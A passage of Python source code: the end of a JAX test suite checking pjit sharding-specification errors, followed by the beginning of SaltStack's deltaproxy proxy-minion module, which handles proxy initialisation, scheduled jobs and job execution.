pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
r"pjit in_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification (None, None, None) for value "
r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
r"non-trivial pytrees should always be wrapped in a tuple representing "
r"the argument list.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x) # Error, but make sure we hint at tupling
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
r"pjit out_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification [[None, None, None], None] for "
r"value tree PyTreeDef([*, *, *]).")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = self.rng()
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.randint(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
@parameterized.named_parameters(
("linear", {'x': 0, 'y': 1, 'z': 2}, (('x',), ('y',), ('z',))),
("combine", {'x': 0, 'y': 0, 'z': 1}, (('x', 'y'), ('z',))),
("skip", {'x': 0, 'y': 0, 'z': 2}, (('x', 'y'), None, ('z',))),
("multi_skip", {'x': 0, 'y': 1, 'z': 3}, (('x',), ('y',), None, ('z',))),
)
def test_array_mapping_to_axis_resources(self, inp, expected_out):
self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)
def test_get_input_metadata_fully_replicated(self):
global_mesh = create_global_mesh((2, 2), ('x', 'y'))
global_in_aval1 = jax.core.ShapedArray((4, 4), jnp.int32)
global_in_aval2 = jax.core.ShapedArray((4, 4, 4), jnp.int32)
global_in_aval3 = jax.core.ShapedArray((), jnp.int32)
in_avals = [global_in_aval1, global_in_aval2, global_in_aval3]
_, out_indices, _ = pxla._get_input_metadata(
in_avals, global_mesh, [{}, {}, {}], [False, False, False])
self.assertLen(out_indices, len(in_avals))
self.assertTrue(all(len(out) == len(global_mesh.local_devices)
for out in out_indices))
self.assertTrue(all(len(i) == aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
self.assertTrue(all(i == (slice(None),) * aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
deltaproxy.py | #
# Proxy minion metaproxy modules
#
import copy
import logging
import os
import sys
import threading
import traceback
import types
import salt
import salt.beacons
import salt.cli.daemons
import salt.client
import salt.config
import salt.crypt
import salt.defaults.exitcodes
import salt.engines
import salt.loader
import salt.log.setup
import salt.minion
import salt.payload
import salt.pillar
import salt.serializers.msgpack
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import tornado.gen
import tornado.ioloop
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltSystemExit,
)
from salt.minion import ProxyMinion
from salt.utils.event import tagify
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def post_master_init(self, master):
"""
Function to finish init after a deltaproxy proxy
minion has finished connecting to a master.
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
"""
if self.connected:
self.opts["pillar"] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
saltenv=self.opts["saltenv"],
pillarenv=self.opts.get("pillarenv"),
).compile_pillar()
# Ensure that the value of master is the one we passed in.
# if pillar_opts is enabled then master could be overwritten
# when compile_pillar is run.
self.opts["master"] = master
tag = "salt/deltaproxy/start"
self._fire_master(tag=tag)
if "proxy" not in self.opts["pillar"] and "proxy" not in self.opts:
errmsg = (
"No proxy key found in pillar or opts for id {}. Check your pillar/opts "
"configuration and contents. Salt-proxy aborted.".format(self.opts["id"])
)
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if "proxy" not in self.opts:
self.opts["proxy"] = self.opts["pillar"]["proxy"]
self.opts = salt.utils.dictupdate.merge(
self.opts,
self.opts["pillar"],
strategy=self.opts.get("proxy_merge_pillar_in_opts_strategy"),
merge_lists=self.opts.get("proxy_deep_merge_pillar_in_opts", False),
)
if self.opts.get("proxy_mines_pillar"):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if "mine_interval" in self.opts["pillar"]:
self.opts["mine_interval"] = self.opts["pillar"]["mine_interval"]
if "mine_functions" in self.opts["pillar"]:
general_proxy_mines = self.opts.get("mine_functions", [])
specific_proxy_mines = self.opts["pillar"]["mine_functions"]
try:
self.opts["mine_functions"] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error(
"Unable to merge mine functions from the pillar in the opts, for proxy %s",
self.opts["id"],
)
fq_proxyname = self.opts["proxy"]["proxytype"]
# Need to load the modules so they get all the dunder variables
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
self.functions.pack["__proxy__"] = self.proxy
self.proxy.pack["__salt__"] = self.functions
self.proxy.pack["__ret__"] = self.returners
self.proxy.pack["__pillar__"] = self.opts["pillar"]
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack["__utils__"] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(
salt.engines.start_engines, self.opts, self.process_manager, proxy=self.proxy
)
proxy_init_func_name = "{}.init".format(fq_proxyname)
proxy_shutdown_func_name = "{}.shutdown".format(fq_proxyname)
if (
proxy_init_func_name not in self.proxy
or proxy_shutdown_func_name not in self.proxy
):
errmsg = (
"Proxymodule {} is missing an init() or a shutdown() or both. "
"Check your proxymodule. Salt-proxy aborted.".format(fq_proxyname)
)
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get(
"{}.module_executors".format(fq_proxyname), lambda: []
)()
proxy_init_fn = self.proxy[proxy_init_func_name]
proxy_init_fn(self.opts)
self.opts["grains"] = salt.loader.grains(self.opts, proxy=self.proxy)
self.mod_opts = self._prep_mod_opts()
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get("user", None))
self.proc_dir = salt.minion.get_proc_dir(self.opts["cachedir"], uid=uid)
if self.connected and self.opts["pillar"]:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
if hasattr(self, "schedule"):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, "schedule"):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[salt.minion.master_event(type="alive")],
proxy=self.proxy,
_subprocess_list=self.subprocess_list,
)
# add default scheduling jobs to the minions scheduler
if self.opts["mine_enabled"] and "mine.update" in self.functions:
self.schedule.add_job(
{
"__mine_interval": {
"function": "mine.update",
"minutes": self.opts["mine_interval"],
"jid_include": True,
"maxrunning": 2,
"run_on_start": True,
"return_job": self.opts.get("mine_return_job", False),
}
},
persist=True,
)
log.info("Added mine.update to scheduler")
else:
self.schedule.delete_job("__mine_interval", persist=True)
# add master_alive job if enabled
if self.opts["transport"] != "tcp" and self.opts["master_alive_interval"] > 0:
self.schedule.add_job(
{
salt.minion.master_event(type="alive", master=self.opts["master"]): {
"function": "status.master",
"seconds": self.opts["master_alive_interval"],
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"master": self.opts["master"], "connected": True},
}
},
persist=True,
)
if (
self.opts["master_failback"]
and "master_list" in self.opts
and self.opts["master"] != self.opts["master_list"][0]
):
self.schedule.add_job(
{
salt.minion.master_event(type="failback"): {
"function": "status.ping_master",
"seconds": self.opts["master_failback_interval"],
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"master": self.opts["master_list"][0]},
}
},
persist=True,
)
else:
self.schedule.delete_job(
salt.minion.master_event(type="failback"), persist=True
)
else:
self.schedule.delete_job(
salt.minion.master_event(type="alive", master=self.opts["master"]),
persist=True,
)
self.schedule.delete_job(
salt.minion.master_event(type="failback"), persist=True
)
# proxy keepalive
proxy_alive_fn = fq_proxyname + ".alive"
if (
proxy_alive_fn in self.proxy
and "status.proxy_reconnect" in self.functions
and self.opts.get("proxy_keep_alive", True)
):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job(
{
"__proxy_keepalive": {
"function": "status.proxy_reconnect",
"minutes": self.opts.get(
"proxy_keep_alive_interval", 1
), # by default, check once per minute
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"proxy_name": fq_proxyname},
}
},
persist=True,
)
self.schedule.enable_schedule()
else:
self.schedule.delete_job("__proxy_keepalive", persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions["saltutil.sync_grains"](saltenv="base")
self.grains_cache = self.opts["grains"]
# Now setup the deltaproxies
self.deltaproxy = {}
self.deltaproxy_opts = {}
self.deltaproxy_objs = {}
self.proxy_grains = {}
self.proxy_pillar = {}
self.proxy_context = {}
self.add_periodic_callback("cleanup", self.cleanup_subprocesses)
for _id in self.opts["proxy"].get("ids", []):
control_id = self.opts["id"]
proxyopts = self.opts.copy()
proxyopts["id"] = _id
proxyopts = salt.config.proxy_config(
self.opts["conf_file"], defaults=proxyopts, minion_id=_id
)
proxyopts["id"] = proxyopts["proxyid"] = _id
proxyopts["subproxy"] = True
self.proxy_context[_id] = {"proxy_id": _id}
# We need grains first to be able to load pillar, which is where we keep the proxy
# configurations
self.proxy_grains[_id] = salt.loader.grains(
proxyopts, proxy=self.proxy, context=self.proxy_context[_id]
)
self.proxy_pillar[_id] = yield salt.pillar.get_async_pillar(
proxyopts,
self.proxy_grains[_id],
_id,
saltenv=proxyopts["saltenv"],
pillarenv=proxyopts.get("pillarenv"),
).compile_pillar()
proxyopts["proxy"] = self.proxy_pillar[_id].get("proxy", {})
# Remove ids
proxyopts["proxy"].pop("ids", None)
proxyopts["pillar"] = self.proxy_pillar[_id]
proxyopts["grains"] = self.proxy_grains[_id]
proxyopts["hash_id"] = self.opts["id"]
_proxy_minion = ProxyMinion(proxyopts)
_proxy_minion.proc_dir = salt.minion.get_proc_dir(
proxyopts["cachedir"], uid=uid
)
_proxy_minion.proxy = salt.loader.proxy(
proxyopts, utils=self.utils, context=self.proxy_context[_id]
)
_proxy_minion.subprocess_list = self.subprocess_list
# And load the modules
(
_proxy_minion.functions,
_proxy_minion.returners,
_proxy_minion.function_errors,
_proxy_minion.executors,
) = _proxy_minion._load_modules(
opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
)
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
_proxy_minion.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])
# And re-load the modules so the __proxy__ variable gets injected
(
_proxy_minion.functions,
_proxy_minion.returners,
_proxy_minion.function_errors,
_proxy_minion.executors,
) = _proxy_minion._load_modules(
opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
)
_proxy_minion.functions.pack["__proxy__"] = _proxy_minion.proxy
_proxy_minion.proxy.pack["__salt__"] = _proxy_minion.functions
_proxy_minion.proxy.pack["__ret__"] = _proxy_minion.returners
_proxy_minion.proxy.pack["__pillar__"] = proxyopts["pillar"]
_proxy_minion.proxy.pack["__grains__"] = proxyopts["grains"]
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
_proxy_minion.proxy.utils = salt.loader.utils(
proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
)
_proxy_minion.proxy.pack["__utils__"] = _proxy_minion.proxy.utils
# Reload all modules so all dunder variables are injected
_proxy_minion.proxy.reload_modules()
_proxy_minion.connected = True
_fq_proxyname = proxyopts["proxy"]["proxytype"]
proxy_init_fn = _proxy_minion.proxy[_fq_proxyname + ".init"]
proxy_init_fn(proxyopts)
# Reload the grains
self.proxy_grains[_id] = salt.loader.grains(
proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
)
proxyopts["grains"] = self.proxy_grains[_id]
if not hasattr(_proxy_minion, "schedule"):
_proxy_minion.schedule = salt.utils.schedule.Schedule(
proxyopts,
_proxy_minion.functions,
_proxy_minion.returners,
cleanup=[salt.minion.master_event(type="alive")],
proxy=_proxy_minion.proxy,
new_instance=True,
_subprocess_list=_proxy_minion.subprocess_list,
)
self.deltaproxy_objs[_id] = _proxy_minion
self.deltaproxy_opts[_id] = copy.deepcopy(proxyopts)
# proxy keepalive
_proxy_alive_fn = _fq_proxyname + ".alive"
if (
_proxy_alive_fn in _proxy_minion.proxy
and "status.proxy_reconnect" in self.deltaproxy_objs[_id].functions
and proxyopts.get("proxy_keep_alive", True)
):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
_proxy_minion.schedule.add_job(
{
"__proxy_keepalive": {
"function": "status.proxy_reconnect",
"minutes": proxyopts.get(
"proxy_keep_alive_interval", 1
), # by default, check once per minute
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"proxy_name": _fq_proxyname},
}
},
persist=True,
)
_proxy_minion.schedule.enable_schedule()
else:
_proxy_minion.schedule.delete_job("__proxy_keepalive", persist=True)
self.ready = True
def target(cls, minion_instance, opts, data, connected):
"""
Handle targeting of the minion.
Calling _thread_multi_return or _thread_return
depending on a single or multiple commands.
"""
log.debug(
"Deltaproxy minion_instance %s(ID: %s). Target: %s",
minion_instance,
minion_instance.opts["id"],
opts["id"],
)
if not hasattr(minion_instance, "proc_dir"):
uid = salt.utils.user.get_uid(user=opts.get("user", None))
minion_instance.proc_dir = salt.minion.get_proc_dir(opts["cachedir"], uid=uid)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data["fun"], tuple) or isinstance(data["fun"], list):
ProxyMinion._thread_multi_return(minion_instance, opts, data)
else:
ProxyMinion._thread_return(minion_instance, opts, data)
def thread_return(cls, minion_instance, opts, data):
"""
This method should be used as a threading target, start the actual
minion side execution.
"""
fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
if opts["multiprocessing"] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle(
"{}._thread_return {}".format(cls.__name__, data["jid"])
)
sdata = {"pid": os.getpid()}
sdata.update(data)
log.info("Starting a new job with PID %s", sdata["pid"])
with salt.utils.files.fopen(fn_, "w+b") as fp_:
fp_.write(salt.payload.dumps(sdata))
ret = {"success": False}
function_name = data["fun"]
executors = (
data.get("module_executors")
or getattr(minion_instance, "module_executors", [])
or opts.get("module_executors", ["direct_call"])
)
allow_missing_funcs = any(
[
minion_instance.executors["{}.allow_missing_func".format(executor)](
function_name
)
for executor in executors
if "{}.allow_missing_func".format(executor) in minion_instance.executors
]
)
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts["pillar"].get(
"minion_blackout", False
):
whitelist = minion_instance.opts["pillar"].get(
"minion_blackout_whitelist", []
)
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if (
function_name != "saltutil.refresh_pillar"
and function_name not in whitelist
):
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts["grains"].get("minion_blackout", False):
whitelist = minion_instance.opts["grains"].get(
"minion_blackout_whitelist", []
)
if (
function_name != "saltutil.refresh_pillar"
and function_name not in whitelist
):
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError(
'Minion in blackout mode. Set "minion_blackout" '
"to False in pillar or grains to resume operations. Only "
"saltutil.refresh_pillar allowed in blackout mode."
)
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = salt.minion.load_args_and_kwargs(func, data["arg"], data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data["arg"], data
minion_instance.functions.pack["__context__"]["retcode"] = 0
minion_instance.functions.pack["__opts__"] = opts
if isinstance(executors, str):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError(
"Wrong executors specification: {}. String or non-empty list expected".format(
executors
)
)
if opts.get("sudo_user", "") and executors[-1] != "sudo":
executors[-1] = "sudo" # replace the last one with sudo
log.debug("Executors list %s", executors)
for name in executors:
fname = "{}.execute".format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError(
"Executor '{}' is not available".format(name)
)
return_data = minion_instance.executors[fname](
opts, data, func, args, kwargs
)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data["jid"], "prog", opts["id"], str(ind)], "job")
event_data = {"return": single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret["return"] = iret
else:
ret["return"] = return_data
retcode = minion_instance.functions.pack["__context__"].get(
"retcode", salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(
return_data.get(x, True) for x in ("result", "success")
)
except Exception: # pylint: disable=broad-except
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret["retcode"] = retcode
ret["success"] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for "{}" not found'.format(function_name)
log.debug(msg, exc_info=True)
ret["return"] = "{}: {}".format(msg, exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in "%s" had a problem: %s',
function_name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
ret["return"] = "ERROR: {}".format(exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing "%s": %s',
function_name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
ret["return"] = 'ERROR executing "{}": {}'.format(function_name, exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = "Passed invalid arguments to {}: {}\n{}".format(
function_name, exc, func.__doc__ or ""
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret["return"] = msg
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except Exception: # pylint: disable=broad-except
msg = "The minion function caused an exception"
log.warning(msg, exc_info=True)
salt.utils.error.fire_exception(
salt.exceptions.MinionError(msg), opts, job=data
)
ret["return"] = "{}: {}".format(msg, traceback.format_exc())
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions["sys.doc"]("{}*".format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(
function_name
)
ret["return"] = docs
else:
ret["return"] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split(".")[0]
if mod_name in minion_instance.function_errors:
ret["return"] += ' Possible reasons: "{}"'.format(
minion_instance.function_errors[mod_name]
)
ret["success"] = False
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
ret["out"] = "nested"
ret["jid"] = data["jid"]
ret["fun"] = data["fun"]
ret["fun_args"] = data["arg"]
if "master_id" in data:
ret["master_id"] = data["master_id"]
if "metadata" in data:
if isinstance(data["metadata"], dict):
ret["metadata"] = data["metadata"]
else:
log.warning("The metadata parameter must be a dictionary. Ignoring.")
if minion_instance.connected:
minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get("return"), str):
if data["ret"]:
data["ret"] = ",".join((data["ret"], opts["return"]))
else:
data["ret"] = opts["return"]
# TODO: make a list? Seems odd to split it this late :/
if data["ret"] and isinstance(data["ret"], str):
if "ret_config" in data:
ret["ret_config"] = data["ret_config"]
if "ret_kwargs" in data:
ret["ret_kwargs"] = data["ret_kwargs"]
ret["id"] = opts["id"]
for returner in set(data["ret"].split(",")):
try:
returner_str = "{}.returner".format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(
returner_str
)
log.error(
"Returner %s could not be loaded: %s",
returner_str,
returner_err,
)
except Exception as exc: # pylint: disable=broad-except
log.exception("The return failed for job %s: %s", data["jid"], exc)
def thread_multi_return(cls, minion_instance, opts, data):
"""
This method should be used as a threading target, start the actual
minion side execution.
"""
fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
if opts["multiprocessing"] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle(
"{}._thread_multi_return {}".format(cls.__name__, data["jid"])
)
sdata = {"pid": os.getpid()}
sdata.update(data)
log.info("Starting a new job with PID %s", sdata["pid"])
with salt.utils.files.fopen(fn_, "w+b") as fp_:
fp_.write(salt.payload.dumps(sdata))
multifunc_ordered = opts.get("multifunc_ordered", False)
num_funcs = len(data["fun"])
if multifunc_ordered:
ret = {
